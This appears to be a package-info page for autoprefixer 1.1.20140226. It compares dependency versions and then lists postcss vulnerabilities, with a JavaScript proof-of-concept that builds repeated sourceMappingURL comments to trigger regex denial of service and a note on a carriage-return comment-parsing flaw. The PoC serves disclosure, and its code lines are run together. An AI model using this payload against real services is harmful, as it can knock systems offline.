The autoprefixer package, a tool crucial for modern web development, saw a minor version update from 1.1.20140222 to 1.1.20140226 in February 2014. Both versions share the core functionality of parsing CSS and automatically adding vendor prefixes, ensuring cross-browser compatibility based on data from the Can I Use website. This significantly eases the burden on developers, allowing them to write clean, standard CSS without manually managing browser-specific prefixes.
Key dependencies like postcss for CSS parsing and fs-extra for file system operations remained consistent between the two releases, indicating a stable foundation. However, the update primarily involved changes in the devDependencies section. Notably, the should assertion library was bumped from version 3.1.2 to 3.1.3, and browserify, the browser-side CommonJS module bundler, saw an upgrade from 3.30.2 to 3.31.2. While seemingly minor, these development dependency updates suggests improvements in the testing and build process of autoprefixer itself. Although the core parsing logic and browser support remained largely unchanged, these upgrades likely addressed internal bug fixes, performance enhancements, or compatibility improvements within the development environment, ultimately contributing to a more robust and reliable tool for end-users. Developers using these tools in their workflow, can enjoy enhancements in terms of developer experience since autoprefixer relies on them.
All the vulnerabilities related to the version 1.1.20140226 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.